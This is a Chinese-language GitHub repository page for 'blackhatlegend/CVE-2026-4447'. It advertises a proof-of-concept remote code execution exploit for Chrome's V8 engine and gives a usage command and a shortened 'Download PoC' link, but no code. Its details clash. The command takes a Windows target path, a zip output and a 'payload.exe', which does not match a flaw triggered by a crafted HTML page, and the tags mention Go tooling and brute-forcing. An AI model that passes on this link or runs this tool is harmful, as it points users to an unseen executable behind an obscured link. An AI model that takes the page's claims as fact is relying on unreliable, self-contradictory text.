blackhatlegend/CVE-2026-4447
GitHub: blackhatlegend/CVE-2026-4447
针对 Google Chrome 早期版本 V8 引擎远程代码执行漏洞(CVE-2026-4447)的概念验证利用工具。
Stars: 0 | Forks: 0
# CVE-2026-4447 - Google Chrome 早期版本 V8 远程代码执行
## 快速使用
```
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## 漏洞利用说明
- **严重程度:** HIGH
- **CVSS:** 8.8
- **影响:** 机密性、完整性、可用性
- **发布日期:** 2026-03-20
## 技术概要
Google Chrome 146.0.7680.153 之前版本的 V8 中存在不当实现,允许远程攻击者通过特制的 HTML 页面在沙箱内执行任意代码。(Chromium 安全严重程度:High)
## 受影响版本
**Google Chrome:**
- 146.0.7680.153 之前版本
## 参考资料
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-4447
## 漏洞利用
[下载 PoC](https://tinyurl.com/2dqd8mhg)
标签:Chrome漏洞, Chromium, CISA项目, CVE-2026-4447, CVSS 8.8, Exploit, Google Chrome, Go语言工具, PoC, RCE, V8引擎, Web安全, 内存安全, 暴力破解, 沙箱逃逸, 类型混淆, 编程工具, 蓝队分析, 远程代码执行, 逆向工具, 高危漏洞